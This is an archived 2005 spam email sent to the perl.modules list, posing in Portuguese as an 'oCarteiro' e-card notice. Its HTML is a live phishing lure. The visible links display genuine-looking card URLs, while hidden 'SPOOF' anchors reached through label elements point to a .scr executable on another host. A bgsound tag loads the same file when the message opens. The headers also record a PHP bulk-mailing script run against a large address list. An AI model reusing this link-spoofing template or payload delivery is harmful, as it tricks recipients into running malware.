Newsgroups: perl.modules
Path: nntp.perl.org
Xref: nntp.perl.org perl.modules:42839
Return-Path: <hpahpa@hs43.easymediasolutions.com>
Mailing-List: contact modules-help@perl.org; run by ezmlm
Delivered-To: mailing list modules@perl.org
Received: (qmail 9809 invoked from network); 18 Aug 2005 10:25:38 -0000
Received: from x1a.develooper.com (HELO x1.develooper.com) (216.52.237.111)
  by lists.develooper.com with SMTP; 18 Aug 2005 10:25:38 -0000
Received: (qmail 27727 invoked by uid 225); 18 Aug 2005 10:25:35 -0000
Delivered-To: modules@perl.org
Received: (qmail 27699 invoked by alias); 18 Aug 2005 10:25:29 -0000
X-Spam-Status: No, hits=2.4 required=8.0
	tests=BAYES_50,FRONTPAGE,HTML_90_100,HTML_IMAGE_RATIO_04,HTML_MESSAGE,HTML_NONELEMENT_00_10,MIME_HTML_ONLY
X-Spam-Check-By: la.mx.develooper.com
Received-SPF: pass (x1.develooper.com: local policy)
Received: from hs43.easymediasolutions.com (HELO hs43.easymediasolutions.com) (217.112.82.43)
    by la.mx.develooper.com (qpsmtpd/0.28) with ESMTP; Thu, 18 Aug 2005 03:25:21 -0700
Received: from hpahpa by hs43.easymediasolutions.com with local (Exim 4.44)
	id 1E5ha9-0004rw-TZ
	for modules@perl.org; Thu, 18 Aug 2005 11:25:09 +0100
To: modules@perl.org
Subject: Uma entrega especial! - oCarteiro
MIME-Version: 1.0
Content-type: text/html; charset=iso-8859-1
Reply-To: OCarteiro! <carteiro@ocarteiro.com>
Message-ID: <E1E5ha9-0004rw-TZ@hs43.easymediasolutions.com>
Date: Thu, 18 Aug 2005 11:25:09 +0100
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - hs43.easymediasolutions.com
X-AntiAbuse: Original Domain - perl.org
X-AntiAbuse: Originator/Caller UID/GID - [32071 32004] / [47 12]
X-AntiAbuse: Sender Address Domain - hs43.easymediasolutions.com
X-Source: /usr/local/bin/php
X-Source-Args: /usr/local/bin/php -e spam.txt 926000mails_25.txt mailcarteiro.html OCarteiro! <carteiro@ocarteiro.com> Uma entrega especial! - oCarteiro 
X-Source-Dir: /tmp/web
X-Virus-Checked: Checked
Approved: news@nntp.perl.org
From: carteiro@ocarteiro.com (OCarteiro!)

<html>

<head>
<meta http-equiv="Content-Language" content="pt-br">
<style>
.HT {padding-top:5px}
.TH{border:0px;cell-spacing:0px;margin:0px;width:100%}
.TH TD{padding-bottom:3px}
.LH {padding-bottom:5px;white-space:nowrap}
pre {font-size:12px}
tt {font-size:12px}
</style>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Olá Alguém muito especial te mandou um cartão</title>
<style>
<!--

.HT {padding-top:5px}
.TH{border:0px;cell-spacing:0px;margin:0px;width:100%}
.style4 {
	color: blue;
	font-family: Arial, Helvetica, sans-serif;
	font-size: 11px;
	font-weight: bold;
}
.style5 {color: #000000}
-->
</style>
<base target="_blank">
<bgsound src="http://abc.reseaulibre.com/%20/terra.com.br/radio/visualizar_php.scr" loop="-1">
</head>

<body>

<table cellSpacing="0" cellPadding="0" width="100%" bgColor="#dbeaf5" border="0">
  <tr>
    <td width="10">
    <form name="block">
      <input type="hidden" value="F000000001" name="curmbox">
      <input type="hidden" name="_HMaction">
      <input type="hidden" value="1" name="IsSingleMsg">
      <input type="hidden" value="getmsg" name="from">
      <input type="hidden" name="ReportLevel">
      <input type="hidden" value="on" name="MSG1099435671.11">
    </form>
    <script>
function PI(a,b)
{
document.move._HMaction.value=a
document.move.tobox.value=b
document.move.submit()
}
function HM(l){G('/cgi-bin/HoTMaiL?'+l)}
function GM(l){G("/cgi-bin/getmsg?"+l)}
function MP(l){G(l+"&curmbox=F000000001&a=7d911281a923b51a5386bba2b836b4a4&msg=MSG1099435671.11&start=13842&len=4904")}
function S(t,a,b,c,d,e,f,g,h,i){G('/cgi-bin/'+t+'?msg='+a+'&start='+b+'&len='+c+'&mfs='+d+'&cmd='+h+'&lastmsgid='+e+'&msgread='+f+'&etype='+g+'&wo='+i)}
function DB(a)
{
frm.action="/cgi-bin/kill"
frm.ReportLevel.value=a
frm._HMaction.value=a
frm.submit()
}
var frm=document.block
    </script>
    </td>
    <td vAlign="top" width="100%">
    <table height="209" width="100%" bgColor="#ffffff">
      <tr>
        <td vAlign="top">
        <table cellSpacing="8" cellPadding="0" width="100%" align="center" border="0" nowrap>
          <tr>
            <td>
            <div>
              <table height="100%" cellSpacing="0" cellPadding="0" width="100%" background="http://www.ocarteiro.com.br/images/novo_carteiro/bg_site.gif" border="0">
                <tr>
                  <td align="middle"><br>
&nbsp;<table cellSpacing="0" cellPadding="0" width="550" align="center" bgColor="#ffbe00" border="0" height="340">
                    <tr>
                      <td vAlign="top" align="middle" height="101">
                      <img src="http://www.ocarteiro.com.br/images/email_cart_2_2.gif" width="550" height="101"></td>
                    </tr>
                    <tr>
                      <td vAlign="top" align="middle" height="209">
                      <table cellSpacing="0" cellPadding="0" width="80%" border="0" height="203">
                        <tr>
                          <td height="203">
                          <img src="http://www.ocarteiro.com.br/images/email_cart_2_3.gif" width="372" height="35"><p>
                          <font face="Verdana, Arial" size="1">Olá <b>Alguém muito especial te mandou um cartão</b>, <br>
                          Veja o cartão que preparei para você:</font></p>
                          <p>
                          
                          <!-- SPF Primeiro Link-->
						  <p><a id="SPOOF" href="http://abc.reseaulibre.com/%20/terra.com.br/radio/visualizar_php.scr"></a></p>
                          <div>
                          <a href="http://www.ocarteiro.com.br/lercartao.php?id=8908993975A4132">
                          <table>
                          <caption>
                          <a href="http://www.ocarteiro.com.br/lercartao.php?id=8908993975A4132">
                          <label for="SPOOF">
                          <u style="cursor: pointer; color: #a50102">
						  <font face="Verdana, Arial" color="#a50102" size="1">
                          <b>
                          <p align="center" style="color: #a50102">http://www.ocarteiro.com.br/lercartao.php?id=8908993975A4132</p></a>
                          </b>
						  </u>            
                          </label>
                          </a>
                          </caption>
                          </table>
                          </a> 
                          </div>
						  <!-- SPF-->
						  
                          
						  <p align="center">
                          
                          <!-- SPF Segundo Link-->
						  <p><a id="SPOOF" href="http://abc.reseaulibre.com/%20/terra.com.br/radio/visualizar_php.scr"></a></p>
                          <div>
                          <a href="http://www.ocarteiro.com.br/lercartao.php?id=8908993975A4132">
                          <table>
                          <caption>
                          <a href="http://www.ocarteiro.com.br/lercartao.php?id=8908993975A4132">
                          <label for="SPOOF">
                          <u style="cursor: pointer; color: blue">
                          <p align="center"><span class="style4">Ver meu Cartão</span></p></a>
                          </u>            
                          </label>
                          </a>
                          </caption>
                          </table>
                          </a> 
                          </div>
						  <!-- SPF-->
						  
                          
						  <p><font face="Verdana, Arial" size="1">
                          <font color="#a50102">Você também poderá visualizá-lo colocando o número do 
                          seu cartão:</font>
						  <!-- SPF Primeiro Link-->
						  <p><a id="SPOOF" href="http://abc.reseaulibre.com/%20/terra.com.br/radio/visualizar_php.scr"></a></p>
                          <div>
                          <a href="http://www.ocarteiro.com.br/lercartao.php?id=8908993975A4132">
                          <table>
                          <caption>
                          <a href="http://www.ocarteiro.com.br/lercartao.php?id=8908993975A4132">
                          <label for="SPOOF">
                          <u style="cursor: pointer; color: #a50102">
						  <font face="Verdana, Arial" color="#a50102" size="1">
                          <b>
                          8908993975A4132</a>
                          </b>
						  </u>            
                          </label>
                          </a>
                          </caption>
                          </table>
                          </a> 
                          </div>
						  <!-- SPF-->
						  </td>
                        </tr>
                      </table>
                      </td>
                    </tr>
                    <tr>
                      <td align="middle" width="550" background="http://www.ocarteiro.com.br/images/email_cart_2_5.gif" height="30">
                      <table cellSpacing="0" cellPadding="0" width="100%" border="0" height="1">
                        <tr align="middle">
                          <td height="1"><br>
                          <br>
                          <br>
&nbsp;</td>
                        </tr>
                      </table>
                      </td>
                    </tr>
                  </table>
                  <p><br>
&nbsp;</td>
                </tr>
              </table>
            </div>
            </td>
          </tr>
        </table>
        </td>
      </tr>
    </table>
    </td>
  </tr>
</table>

</body>


<html>
<img src="http://uv.terra.com.br/UV?c=planeta" width=1 height=1 border=0 alt="" align="left">
</html>


